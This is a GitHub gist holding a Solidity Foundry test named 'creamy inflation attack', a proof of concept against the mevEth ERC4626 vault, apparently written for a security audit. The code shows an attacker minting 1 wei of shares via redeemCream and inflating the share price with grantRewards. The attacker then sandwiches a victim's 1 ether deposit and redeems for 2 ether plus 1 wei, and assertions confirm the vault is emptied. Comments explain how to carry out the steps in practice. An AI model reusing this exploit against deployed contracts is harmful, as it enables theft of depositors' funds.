Skip to content

Instantly share code, notes, and snippets.

@okkothejawa

okkothejawa/CreamyInflation.md Secret

Last active September 11, 2023 19:38
Show Gist options
  • Save okkothejawa/86d046ff5f1dbd1875abeb054b1a221d to your computer and use it in GitHub Desktop.
Save okkothejawa/86d046ff5f1dbd1875abeb054b1a221d to your computer and use it in GitHub Desktop.
Download ZIP
creamy inflation attack
Raw
CreamyInflation.md

PATCH THE REDEEMCREAM TRANSFER TO 0 BUG BEFORE RUNNING THIS, APPEND THIS TO ERC4626FULLTEST

function testCreamyInflationAttack() public {
        address cream = 0x49D72e3973900A195A155a46441F0C08179FdB64;
        uint256 creamAmount = 1; // 1 wei
        // give 1 wei of cream to attacker, and 1 whole ether
        deal(cream, User01, creamAmount);
        vm.deal(User01, 1 ether);
        vm.deal(address(mevEth), creamAmount); // attacker needs to dump the creamAmount so the last redeem don't revert, can be done in practice with selfdestruct to dump native ether directly as fallback is access controlled and grantRewards inflates fraction.elastic which we don't want at this step 

        vm.startPrank(User01); // attacker frontruns
        ERC20(cream).approve(address(mevEth), creamAmount);
        mevEth.redeemCream(creamAmount);

        assertEq(mevEth.balanceOf(User01), creamAmount);

        // dump 1 ether to inflate `fraction.elastic`
        mevEth.grantRewards{ value: 1 ether }();

        vm.startPrank(User02); // victim deposits 1 ether
        mevEth.deposit{ value: 1 ether }(1 ether, User02);
        assertEq(mevEth.balanceOf(User02), 0);

        vm.startPrank(User01); // attacker sandwiches the victim

        mevEth.redeem(mevEth.balanceOf(User01), User01, User01); // redeems all of their shares
        assertEq(weth.balanceOf(User01), 2 ether + 1 wei); // attacker steals victim's funds
        assertEq(address(mevEth).balance, 0); // assert all funds are stolen from meveth
    }
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment